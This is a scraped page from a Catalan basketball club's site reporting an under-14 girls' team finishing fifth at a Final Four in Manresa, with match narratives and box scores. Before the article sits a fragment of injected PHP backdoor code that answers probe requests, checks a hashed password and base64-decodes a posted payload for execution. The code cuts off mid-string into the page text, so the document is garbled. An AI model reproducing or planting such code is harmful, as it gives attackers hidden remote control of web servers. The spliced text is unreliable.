function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L’Infantil Femení Preferent B queda 5è en la F4 disputada a Manresa - Tgn Bàsquet Club -

L’Infantil Femení Preferent B queda 5è en la F4 disputada a Manresa

Updated: maig 10, 2022

Semifinal pel 5è al 8è lloc

El partit començaria amb dubtes per part del TGN, amb només un punt anotat als primers set minuts de partit. Però a partir d’aquí es van deixar anar i fins a l’últim quart el duel es va convertir en un partit igualat amb moltes alternances al marcador. El TGN va patir aquests tres quarts amb els llançaments de tirs lliures, amb estadístiques molt allunyades del que és habitual, sent tan sols d’un 34%, fallant fins a 21 tirs lliures. També hi havia problemes amb el rebot, la jugadora del JET, Badiane, va tenir un gran domini en aquest aspecte del joc.
Arribat el quart període el TGN va fer un pas endavant, en la seva defensa va ser implacable, i va aconseguir obrir una gran diferència al marcador.
A part de la magnífica defensa lila, s’hi unia la bona circulació de pilota entre les jugadores del TGN, i el poder de les jugadores interiors, que sempre treien avantatge.
Pel que fa a anotació i joc van destacar les jugadores del TGN: Casadó (11 punts), Villalba (14 punts) i Port (10 punts).
L’equip del JET, durant el tercer i quart període, va caure en una dinàmica de faltes i protestes, que les va treure del matx tant les jugadores com l’entrenador (expulsat per dues tècniques al min 37 de partit).

TGN BÀSQUET 08A   55

JET JAMON & ART  44

TGN BÀSQUET 08A: Villalba (14), Fernández (5), J. Écija (7), Puerto (10), Casadó (11) —cinc inicial— Amigó (5), Muñoz (0), March (2), Martínez (1), Vilanova (0), Menzinger (0).  2 triples: Ecija, y Villaba. 11/32 tirs lliures. 20 faltes.

JET JAMON & ART: Ramos (7), Prats  (6), Aguilera (3), Roca (7), Badiane (11) —cinc inicial— Rimbau (8), Garcia (0),  Nogues (0), Montalvo (2), Vidal (0), y Aijon (0).  3 triples: Rimbau, Roca y Aguilera. 9/18 tirs lliures. 26  faltes. Eliminats: Rimbau (min 37), Roca (min 37), Aguilera (min 40).

PARCIALS: 07-10, 19-16, 12-09, 17-09.

ÀRBITRES: Xoan García, y Joan Morell

FINAL pel 5è – 6è lloc

Partit que fins a dues vegades, el TGN es va posar a 17 punts per sobre al marcador, però com sol ser costum en aquests partits, ningú es rendeix, i es lluita fins al final, aconseguint acostar-se amb un gran parcial a favor seu les del Grup Barna, fins als 3 punts en els últims segons del matx.
En aquest partit, encara amb més baixes d’última hora, en total tres jugadores, l’equip es va recompondre, i a través d’una gran defensa, i un gran encert als tirs lliures i en el tir de tres punts va aconseguir diferències que van fer que encara que el conjunt rival aconseguís escurçar distàncies, aquesta fos insuficient.
Van assumir una gran responsabilitat en l’anotació per part de les del TGN Diana Puerto (18 punts), i Paula Fernández (17 punts), totes dues amb gran encert en els tirs de dos punts i en els tirs lliures.